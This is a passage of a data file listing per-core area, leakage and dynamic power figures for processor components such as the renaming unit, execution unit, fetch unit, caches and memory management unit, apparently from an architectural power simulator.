'Renaming Unit/Area': 0.369768,
'Renaming Unit/FP Front End RAT/Area': 0.168486,
'Renaming Unit/FP Front End RAT/Gate Leakage': 0.00489731,
'Renaming Unit/FP Front End RAT/Peak Dynamic': 3.33511,
'Renaming Unit/FP Front End RAT/Runtime Dynamic': 0.521614,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage': 0.0437281,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage with power gating': 0.024925,
'Renaming Unit/Free List/Area': 0.0414755,
'Renaming Unit/Free List/Gate Leakage': 4.15911e-05,
'Renaming Unit/Free List/Peak Dynamic': 0.0401324,
'Renaming Unit/Free List/Runtime Dynamic': 0.0240286,
'Renaming Unit/Free List/Subthreshold Leakage': 0.000670426,
'Renaming Unit/Free List/Subthreshold Leakage with power gating': 0.000377987,
'Renaming Unit/Gate Leakage': 0.00863632,
'Renaming Unit/Int Front End RAT/Area': 0.114751,
'Renaming Unit/Int Front End RAT/Gate Leakage': 0.00038343,
'Renaming Unit/Int Front End RAT/Peak Dynamic': 0.86945,
'Renaming Unit/Int Front End RAT/Runtime Dynamic': 0.170742,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage': 0.00611897,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage with power gating': 0.00348781,
'Renaming Unit/Peak Dynamic': 4.56169,
'Renaming Unit/Runtime Dynamic': 0.716385,
'Renaming Unit/Subthreshold Leakage': 0.070483,
'Renaming Unit/Subthreshold Leakage with power gating': 0.0362779,
'Runtime Dynamic': 6.82883,
'Subthreshold Leakage': 6.21877,
'Subthreshold Leakage with power gating': 2.58311},
{'Area': 32.0201,
'Execution Unit/Area': 7.68434,
'Execution Unit/Complex ALUs/Area': 0.235435,
'Execution Unit/Complex ALUs/Gate Leakage': 0.0132646,
'Execution Unit/Complex ALUs/Peak Dynamic': 0.063862,
'Execution Unit/Complex ALUs/Runtime Dynamic': 0.252849,
'Execution Unit/Complex ALUs/Subthreshold Leakage': 0.20111,
'Execution Unit/Complex ALUs/Subthreshold Leakage with power gating': 0.0754163,
'Execution Unit/Floating Point Units/Area': 4.6585,
'Execution Unit/Floating Point Units/Gate Leakage': 0.0656156,
'Execution Unit/Floating Point Units/Peak Dynamic': 0.377135,
'Execution Unit/Floating Point Units/Runtime Dynamic': 0.304033,
'Execution Unit/Floating Point Units/Subthreshold Leakage': 0.994829,
'Execution Unit/Floating Point Units/Subthreshold Leakage with power gating': 0.373061,
'Execution Unit/Gate Leakage': 0.120359,
'Execution Unit/Instruction Scheduler/Area': 1.66526,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Area': 0.275653,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Gate Leakage': 0.000977433,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Peak Dynamic': 1.04181,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Runtime Dynamic': 0.159748,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage': 0.0143453,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage with power gating': 0.00810519,
'Execution Unit/Instruction Scheduler/Gate Leakage': 0.00568913,
'Execution Unit/Instruction Scheduler/Instruction Window/Area': 0.805223,
'Execution Unit/Instruction Scheduler/Instruction Window/Gate Leakage': 0.00414562,
'Execution Unit/Instruction Scheduler/Instruction Window/Peak Dynamic': 1.6763,
'Execution Unit/Instruction Scheduler/Instruction Window/Runtime Dynamic': 0.257667,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage': 0.0625755,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage with power gating': 0.0355964,
'Execution Unit/Instruction Scheduler/Peak Dynamic': 3.82262,
'Execution Unit/Instruction Scheduler/ROB/Area': 0.584388,
'Execution Unit/Instruction Scheduler/ROB/Gate Leakage': 0.00056608,
'Execution Unit/Instruction Scheduler/ROB/Peak Dynamic': 1.10451,
'Execution Unit/Instruction Scheduler/ROB/Runtime Dynamic': 0.130062,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage': 0.00906853,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage with power gating': 0.00364446,
'Execution Unit/Instruction Scheduler/Runtime Dynamic': 0.547476,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage': 0.0859892,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage with power gating': 0.047346,
'Execution Unit/Integer ALUs/Area': 0.47087,
'Execution Unit/Integer ALUs/Gate Leakage': 0.0265291,
'Execution Unit/Integer ALUs/Peak Dynamic': 0.124885,
'Execution Unit/Integer ALUs/Runtime Dynamic': 0.101344,
'Execution Unit/Integer ALUs/Subthreshold Leakage': 0.40222,
'Execution Unit/Integer ALUs/Subthreshold Leakage with power gating': 0.150833,
'Execution Unit/Peak Dynamic': 4.71321,
'Execution Unit/Register Files/Area': 0.570804,
'Execution Unit/Register Files/Floating Point RF/Area': 0.208131,
'Execution Unit/Register Files/Floating Point RF/Gate Leakage': 0.000232788,
'Execution Unit/Register Files/Floating Point RF/Peak Dynamic': 0.0712489,
'Execution Unit/Register Files/Floating Point RF/Runtime Dynamic': 0.00670053,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage': 0.00399698,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage with power gating': 0.00176968,
'Execution Unit/Register Files/Gate Leakage': 0.000622708,
'Execution Unit/Register Files/Integer RF/Area': 0.362673,
'Execution Unit/Register Files/Integer RF/Gate Leakage': 0.00038992,
'Execution Unit/Register Files/Integer RF/Peak Dynamic': 0.0710506,
'Execution Unit/Register Files/Integer RF/Runtime Dynamic': 0.0495546,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage': 0.00614175,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage with power gating': 0.00246675,
'Execution Unit/Register Files/Peak Dynamic': 0.142299,
'Execution Unit/Register Files/Runtime Dynamic': 0.0562551,
'Execution Unit/Register Files/Subthreshold Leakage': 0.0101387,
'Execution Unit/Register Files/Subthreshold Leakage with power gating': 0.00423643,
'Execution Unit/Results Broadcast Bus/Area Overhead': 0.0390912,
'Execution Unit/Results Broadcast Bus/Gate Leakage': 0.00537402,
'Execution Unit/Results Broadcast Bus/Peak Dynamic': 0.165653,
'Execution Unit/Results Broadcast Bus/Runtime Dynamic': 0.404172,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage': 0.081478,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage with power gating': 0.0305543,
'Execution Unit/Runtime Dynamic': 1.66613,
'Execution Unit/Subthreshold Leakage': 1.79543,
'Execution Unit/Subthreshold Leakage with power gating': 0.688821,
'Gate Leakage': 0.368936,
'Instruction Fetch Unit/Area': 5.85939,
'Instruction Fetch Unit/Branch Predictor/Area': 0.138516,
'Instruction Fetch Unit/Branch Predictor/Chooser/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Chooser/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Chooser/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Chooser/Runtime Dynamic': 0.000716169,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/Gate Leakage': 0.000757657,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Runtime Dynamic': 0.000716169,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Area': 0.0257064,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Gate Leakage': 0.000154548,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Peak Dynamic': 0.0142575,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Runtime Dynamic': 0.000643745,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage': 0.00384344,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage with power gating': 0.00198631,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Area': 0.0151917,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Gate Leakage': 8.00196e-05,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Peak Dynamic': 0.00527447,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Runtime Dynamic': 0.000260123,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage': 0.00181347,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage with power gating': 0.000957045,
'Instruction Fetch Unit/Branch Predictor/Peak Dynamic': 0.0597838,
'Instruction Fetch Unit/Branch Predictor/RAS/Area': 0.0105732,
'Instruction Fetch Unit/Branch Predictor/RAS/Gate Leakage': 4.63858e-05,
'Instruction Fetch Unit/Branch Predictor/RAS/Peak Dynamic': 0.0117602,
'Instruction Fetch Unit/Branch Predictor/RAS/Runtime Dynamic': 0.000711855,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage': 0.000932505,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage with power gating': 0.000494733,
'Instruction Fetch Unit/Branch Predictor/Runtime Dynamic': 0.00278794,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage': 0.0199703,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage with power gating': 0.0103282,
'Instruction Fetch Unit/Branch Target Buffer/Area': 0.64954,
'Instruction Fetch Unit/Branch Target Buffer/Gate Leakage': 0.00272758,
'Instruction Fetch Unit/Branch Target Buffer/Peak Dynamic': 0.177867,
'Instruction Fetch Unit/Branch Target Buffer/Runtime Dynamic': 0.00615331,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage': 0.0811682,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage with power gating': 0.0435357,
'Instruction Fetch Unit/Gate Leakage': 0.0589979,
'Instruction Fetch Unit/Instruction Buffer/Area': 0.0226323,
'Instruction Fetch Unit/Instruction Buffer/Gate Leakage': 6.83558e-05,
'Instruction Fetch Unit/Instruction Buffer/Peak Dynamic': 0.606827,
'Instruction Fetch Unit/Instruction Buffer/Runtime Dynamic': 0.0476381,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage': 0.00151885,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage with power gating': 0.000701682,
'Instruction Fetch Unit/Instruction Cache/Area': 3.14635,
'Instruction Fetch Unit/Instruction Cache/Gate Leakage': 0.029931,
'Instruction Fetch Unit/Instruction Cache/Peak Dynamic': 3.03019,
'Instruction Fetch Unit/Instruction Cache/Runtime Dynamic': 0.131623,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage': 0.367022,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage with power gating': 0.180386,
'Instruction Fetch Unit/Instruction Decoder/Area': 1.85799,
'Instruction Fetch Unit/Instruction Decoder/Gate Leakage': 0.0222493,
'Instruction Fetch Unit/Instruction Decoder/Peak Dynamic': 1.37404,
'Instruction Fetch Unit/Instruction Decoder/Runtime Dynamic': 0.1618,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage': 0.442943,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage with power gating': 0.166104,
'Instruction Fetch Unit/Peak Dynamic': 5.39576,
'Instruction Fetch Unit/Runtime Dynamic': 0.350003,
'Instruction Fetch Unit/Subthreshold Leakage': 0.932286,
'Instruction Fetch Unit/Subthreshold Leakage with power gating': 0.40843,
'L2/Area': 4.53318,
'L2/Gate Leakage': 0.015464,
'L2/Peak Dynamic': 0.0342408,
'L2/Runtime Dynamic': 0.00773407,
'L2/Subthreshold Leakage': 0.834142,
'L2/Subthreshold Leakage with power gating': 0.401066,
'Load Store Unit/Area': 8.80901,
'Load Store Unit/Data Cache/Area': 6.84535,
'Load Store Unit/Data Cache/Gate Leakage': 0.0279261,
'Load Store Unit/Data Cache/Peak Dynamic': 2.94187,
'Load Store Unit/Data Cache/Runtime Dynamic': 0.829599,
'Load Store Unit/Data Cache/Subthreshold Leakage': 0.527675,
'Load Store Unit/Data Cache/Subthreshold Leakage with power gating': 0.25085,
'Load Store Unit/Gate Leakage': 0.0350888,
'Load Store Unit/LoadQ/Area': 0.0836782,
'Load Store Unit/LoadQ/Gate Leakage': 0.00059896,
'Load Store Unit/LoadQ/Peak Dynamic': 0.0551528,
'Load Store Unit/LoadQ/Runtime Dynamic': 0.0551528,
'Load Store Unit/LoadQ/Subthreshold Leakage': 0.00941961,
'Load Store Unit/LoadQ/Subthreshold Leakage with power gating': 0.00536918,
'Load Store Unit/Peak Dynamic': 3.20231,
'Load Store Unit/Runtime Dynamic': 1.15675,
'Load Store Unit/StoreQ/Area': 0.322079,
'Load Store Unit/StoreQ/Gate Leakage': 0.00329971,
'Load Store Unit/StoreQ/Peak Dynamic': 0.135997,
'Load Store Unit/StoreQ/Runtime Dynamic': 0.271995,
'Load Store Unit/StoreQ/Subthreshold Leakage': 0.0345621,
'Load Store Unit/StoreQ/Subthreshold Leakage with power gating': 0.0197004,
'Load Store Unit/Subthreshold Leakage': 0.591321,
'Load Store Unit/Subthreshold Leakage with power gating': 0.283293,
'Memory Management Unit/Area': 0.4339,
'Memory Management Unit/Dtlb/Area': 0.0879726,
'Memory Management Unit/Dtlb/Gate Leakage': 0.00088729,
'Memory Management Unit/Dtlb/Peak Dynamic': 0.0482659,
'Memory Management Unit/Dtlb/Runtime Dynamic': 0.0487271,
'Memory Management Unit/Dtlb/Subthreshold Leakage': 0.0155699,
'Memory Management Unit/Dtlb/Subthreshold Leakage with power gating': 0.00887485,
'Memory Management Unit/Gate Leakage': 0.00808595,
'Memory Management Unit/Itlb/Area': 0.301552,
'Memory Management Unit/Itlb/Gate Leakage': 0.00393464,
'Memory Management Unit/Itlb/Peak Dynamic': 0.188406,
'Memory Management Unit/Itlb/Runtime Dynamic': 0.0217347,
'Memory Management Unit/Itlb/Subthreshold Leakage': 0.0413758,
'Memory Management Unit/Itlb/Subthreshold Leakage with power gating': 0.0235842,
'Memory Management Unit/Peak Dynamic': 0.427427,
'Memory Management Unit/Runtime Dynamic': 0.0704619,
'Memory Management Unit/Subthreshold Leakage': 0.0766103,
'Memory Management Unit/Subthreshold Leakage with power gating': 0.0398333,
'Peak Dynamic': 17.3624,
'Renaming Unit/Area': 0.303608,
'Renaming Unit/FP Front End RAT/Area': 0.131045,
'Renaming Unit/FP Front End RAT/Gate Leakage': 0.00351123,
'Renaming Unit/FP Front End RAT/Peak Dynamic': 2.51468,
'Renaming Unit/FP Front End RAT/Runtime Dynamic': 0.187423,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage': 0.0308571,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage with power gating': 0.0175885,
'Renaming Unit/Free List/Area': 0.0340654,
'Renaming Unit/Free List/Gate Leakage': 2.5481e-05,
'Renaming Unit/Free List/Peak Dynamic': 0.0306032,
'Renaming Unit/Free List/Runtime Dynamic': 0.00948827,
'Renaming Unit/Free List/Subthreshold Leakage': 0.000370144,
'Renaming Unit/Free List/Subthreshold Leakage with power gating': 0.000201064,
'Renaming Unit/Gate Leakage': 0.00708398,
'Renaming Unit/Int Front End RAT/Area': 0.0941223,
'Renaming Unit/Int Front End RAT/Gate Leakage': 0.000283242,
'Renaming Unit/Int Front End RAT/Peak Dynamic': 0.731965,
'Renaming Unit/Int Front End RAT/Runtime Dynamic': 0.0776506,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage': 0.00435488,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage with power gating': 0.00248228,
'Renaming Unit/Peak Dynamic': 3.58947,
'Renaming Unit/Runtime Dynamic': 0.274562,
'Renaming Unit/Subthreshold Leakage': 0.0552466,
'Renaming Unit/Subthreshold Leakage with power gating': 0.0276461,
'Runtime Dynamic': 3.52564,
'Subthreshold Leakage': 6.16288,
'Subthreshold Leakage with power gating': 2.55328},
{'Area': 32.0201,
'Execution Unit/Area': 7.68434,
'Execution Unit/Complex ALUs/Area': 0.235435,
'Execution Unit/Complex ALUs/Gate Leakage': 0.0132646,
'Execution Unit/Complex ALUs/Peak Dynamic': 0.0492287,
'Execution Unit/Complex ALUs/Runtime Dynamic': 0.241355,
'Execution Unit/Complex ALUs/Subthreshold Leakage': 0.20111,
'Execution Unit/Complex ALUs/Subthreshold Leakage with power gating': 0.0754163,
'Execution Unit/Floating Point Units/Area': 4.6585,
'Execution Unit/Floating Point Units/Gate Leakage': 0.0656156,
'Execution Unit/Floating Point Units/Peak Dynamic': 0.260146,
'Execution Unit/Floating Point Units/Runtime Dynamic': 0.304033,
'Execution Unit/Floating Point Units/Subthreshold Leakage': 0.994829,
'Execution Unit/Floating Point Units/Subthreshold Leakage with power gating': 0.373061,
'Execution Unit/Gate Leakage': 0.120359,
'Execution Unit/Instruction Scheduler/Area': 1.66526,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Area': 0.275653,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Gate Leakage': 0.000977433,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Peak Dynamic': 1.04181,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Runtime Dynamic': 0.123302,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage': 0.0143453,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage with power gating': 0.00810519,
'Execution Unit/Instruction Scheduler/Gate Leakage': 0.00568913,
'Execution Unit/Instruction Scheduler/Instruction Window/Area': 0.805223,
'Execution Unit/Instruction Scheduler/Instruction Window/Gate Leakage': 0.00414562,
'Execution Unit/Instruction Scheduler/Instruction Window/Peak Dynamic': 1.6763,
'Execution Unit/Instruction Scheduler/Instruction Window/Runtime Dynamic': 0.198882,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage': 0.0625755,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage with power gating': 0.0355964,
'Execution Unit/Instruction Scheduler/Peak Dynamic': 3.82262,
'Execution Unit/Instruction Scheduler/ROB/Area': 0.584388,
'Execution Unit/Instruction Scheduler/ROB/Gate Leakage': 0.00056608,
'Execution Unit/Instruction Scheduler/ROB/Peak Dynamic': 1.10451,
'Execution Unit/Instruction Scheduler/ROB/Runtime Dynamic': 0.100389,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage': 0.00906853,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage with power gating': 0.00364446,
'Execution Unit/Instruction Scheduler/Runtime Dynamic': 0.422572,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage': 0.0859892,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage with power gating': 0.047346,
'Execution Unit/Integer ALUs/Area': 0.47087,
'Execution Unit/Integer ALUs/Gate Leakage': 0.0265291,
'Execution Unit/Integer ALUs/Peak Dynamic': 0.101137,
'Execution Unit/Integer ALUs/Runtime Dynamic': 0.101344,
'Execution Unit/Integer ALUs/Subthreshold Leakage': 0.40222,
'Execution Unit/Integer ALUs/Subthreshold Leakage with power gating': 0.150833,
'Execution Unit/Peak Dynamic': 4.48232,
'Execution Unit/Register Files/Area': 0.570804,
'Execution Unit/Register Files/Floating Point RF/Area': 0.208131,
'Execution Unit/Register Files/Floating Point RF/Gate Leakage': 0.000232788,
'Execution Unit/Register Files/Floating Point RF/Peak Dynamic': 0.0491471,
'Execution Unit/Register Files/Floating Point RF/Runtime Dynamic': 0.00517184,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage': 0.00399698,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage with power gating': 0.00176968,
'Execution Unit/Register Files/Gate Leakage': 0.000622708,
'Execution Unit/Register Files/Integer RF/Area': 0.362673,
'Execution Unit/Register Files/Integer RF/Gate Leakage': 0.00038992,
'Execution Unit/Register Files/Integer RF/Peak Dynamic': 0.0560611,
'Execution Unit/Register Files/Integer RF/Runtime Dynamic': 0.0382489,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage': 0.00614175,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage with power gating': 0.00246675,
'Execution Unit/Register Files/Peak Dynamic': 0.105208,
'Execution Unit/Register Files/Runtime Dynamic': 0.0434208,
'Execution Unit/Register Files/Subthreshold Leakage': 0.0101387,
'Execution Unit/Register Files/Subthreshold Leakage with power gating': 0.00423643,
'Execution Unit/Results Broadcast Bus/Area Overhead': 0.0390912,
'Execution Unit/Results Broadcast Bus/Gate Leakage': 0.00537402,
'Execution Unit/Results Broadcast Bus/Peak Dynamic': 0.130415,
'Execution Unit/Results Broadcast Bus/Runtime Dynamic': 0.300512,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage': 0.081478,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage with power gating': 0.0305543,
'Execution Unit/Runtime Dynamic': 1.41324,
'Execution Unit/Subthreshold Leakage': 1.79543,
'Execution Unit/Subthreshold Leakage with power gating': 0.688821,
'Gate Leakage': 0.368936,
'Instruction Fetch Unit/Area': 5.85939,
'Instruction Fetch Unit/Branch Predictor/Area': 0.138516,
'Instruction Fetch Unit/Branch Predictor/Chooser/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Chooser/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Chooser/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Chooser/Runtime Dynamic': 0.000679372,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/Gate Leakage': 0.000757657,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Runtime Dynamic': 0.000679372,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Area': 0.0257064,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Gate Leakage': 0.000154548,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Peak Dynamic': 0.0142575,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Runtime Dynamic': 0.000613657,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage': 0.00384344,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage with power gating': 0.00198631,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Area': 0.0151917,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Gate Leakage': 8.00196e-05,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Peak Dynamic': 0.00527447,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Runtime Dynamic': 0.000249548,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage': 0.00181347,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage with power gating': 0.000957045,
'Instruction Fetch Unit/Branch Predictor/Peak Dynamic': 0.0597838,
'Instruction Fetch Unit/Branch Predictor/RAS/Area': 0.0105732,
'Instruction Fetch Unit/Branch Predictor/RAS/Gate Leakage': 4.63858e-05,
'Instruction Fetch Unit/Branch Predictor/RAS/Peak Dynamic': 0.0117602,
'Instruction Fetch Unit/Branch Predictor/RAS/Runtime Dynamic': 0.000549449,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage': 0.000932505,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage with power gating': 0.000494733,
'Instruction Fetch Unit/Branch Predictor/Runtime Dynamic': 0.00252185,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage': 0.0199703,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage with power gating': 0.0103282,
'Instruction Fetch Unit/Branch Target Buffer/Area': 0.64954,
'Instruction Fetch Unit/Branch Target Buffer/Gate Leakage': 0.00272758,
'Instruction Fetch Unit/Branch Target Buffer/Peak Dynamic': 0.177867,
'Instruction Fetch Unit/Branch Target Buffer/Runtime Dynamic': 0.00573042,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage': 0.0811682,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage with power gating': 0.0435357,
'Instruction Fetch Unit/Gate Leakage': 0.0589979,
'Instruction Fetch Unit/Instruction Buffer/Area': 0.0226323,
'Instruction Fetch Unit/Instruction Buffer/Gate Leakage': 6.83558e-05,
'Instruction Fetch Unit/Instruction Buffer/Peak Dynamic': 0.606827,
'Instruction Fetch Unit/Instruction Buffer/Runtime Dynamic': 0.0367697,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage': 0.00151885,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage with power gating': 0.000701682,
'Instruction Fetch Unit/Instruction Cache/Area': 3.14635,
'Instruction Fetch Unit/Instruction Cache/Gate Leakage': 0.029931,
'Instruction Fetch Unit/Instruction Cache/Peak Dynamic': 2.33887,
'Instruction Fetch Unit/Instruction Cache/Runtime Dynamic': 0.0980438,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage': 0.367022,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage with power gating': 0.180386,
'Instruction Fetch Unit/Instruction Decoder/Area': 1.85799,
'Instruction Fetch Unit/Instruction Decoder/Gate Leakage': 0.0222493,
'Instruction Fetch Unit/Instruction Decoder/Peak Dynamic': 1.37404,
'Instruction Fetch Unit/Instruction Decoder/Runtime Dynamic': 0.124886,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage': 0.442943,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage with power gating': 0.166104,
'Instruction Fetch Unit/Peak Dynamic': 4.67089,
'Instruction Fetch Unit/Runtime Dynamic': 0.267952,
'Instruction Fetch Unit/Subthreshold Leakage': 0.932286,
'Instruction Fetch Unit/Subthreshold Leakage with power gating': 0.40843,
'L2/Area': 4.53318,
'L2/Gate Leakage': 0.015464,
'L2/Peak Dynamic': 0.0363631,
'L2/Runtime Dynamic': 0.00744087,
'L2/Subthreshold Leakage': 0.834142,
'L2/Subthreshold Leakage with power gating': 0.401066,
'Load Store Unit/Area': 8.80901,
'Load Store Unit/Data Cache/Area': 6.84535,
'Load Store Unit/Data Cache/Gate Leakage': 0.0279261,
'Load Store Unit/Data Cache/Peak Dynamic': 2.49217,
'Load Store Unit/Data Cache/Runtime Dynamic': 0.612821,
'Load Store Unit/Data Cache/Subthreshold Leakage': 0.527675,
'Load Store Unit/Data Cache/Subthreshold Leakage with power gating': 0.25085,
'Load Store Unit/Gate Leakage': 0.0350888,
'Load Store Unit/LoadQ/Area': 0.0836782,
'Load Store Unit/LoadQ/Gate Leakage': 0.00059896,
'Load Store Unit/LoadQ/Peak Dynamic': 0.0406038,
'Load Store Unit/LoadQ/Runtime Dynamic': 0.0406037,
'Load Store Unit/LoadQ/Subthreshold Leakage': 0.00941961,
'Load Store Unit/LoadQ/Subthreshold Leakage with power gating': 0.00536918,
'Load Store Unit/Peak Dynamic': 2.68391,
'Load Store Unit/Runtime Dynamic': 0.853668,
'Load Store Unit/StoreQ/Area': 0.322079,
'Load Store Unit/StoreQ/Gate Leakage': 0.00329971,
'Load Store Unit/StoreQ/Peak Dynamic': 0.100122,
'Load Store Unit/StoreQ/Runtime Dynamic': 0.200244,
'Load Store Unit/StoreQ/Subthreshold Leakage': 0.0345621,
'Load Store Unit/StoreQ/Subthreshold Leakage with power gating': 0.0197004,
'Load Store Unit/Subthreshold Leakage': 0.591321,
'Load Store Unit/Subthreshold Leakage with power gating': 0.283293,
'Memory Management Unit/Area': 0.4339,
'Memory Management Unit/Dtlb/Area': 0.0879726,
'Memory Management Unit/Dtlb/Gate Leakage': 0.00088729,
'Memory Management Unit/Dtlb/Peak Dynamic': 0.0355336,
'Memory Management Unit/Dtlb/Runtime Dynamic': 0.0360296,
'Memory Management Unit/Dtlb/Subthreshold Leakage': 0.0155699,
'Memory Management Unit/Dtlb/Subthreshold Leakage with power gating': 0.00887485,
'Memory Management Unit/Gate Leakage': 0.00808595,
'Memory Management Unit/Itlb/Area': 0.301552,
'Memory Management Unit/Itlb/Gate Leakage': 0.00393464,
'Memory Management Unit/Itlb/Peak Dynamic': 0.145422,
'Memory Management Unit/Itlb/Runtime Dynamic': 0.0162211,
'Memory Management Unit/Itlb/Subthreshold Leakage': 0.0413758,
'Memory Management Unit/Itlb/Subthreshold Leakage with power gating': 0.0235842,
'Memory Management Unit/Peak Dynamic': 0.362571,
'Memory Management Unit/Runtime Dynamic': 0.0522507,
'Memory Management Unit/Subthreshold Leakage': 0.0766103,
'Memory Management Unit/Subthreshold Leakage with power gating': 0.0398333,
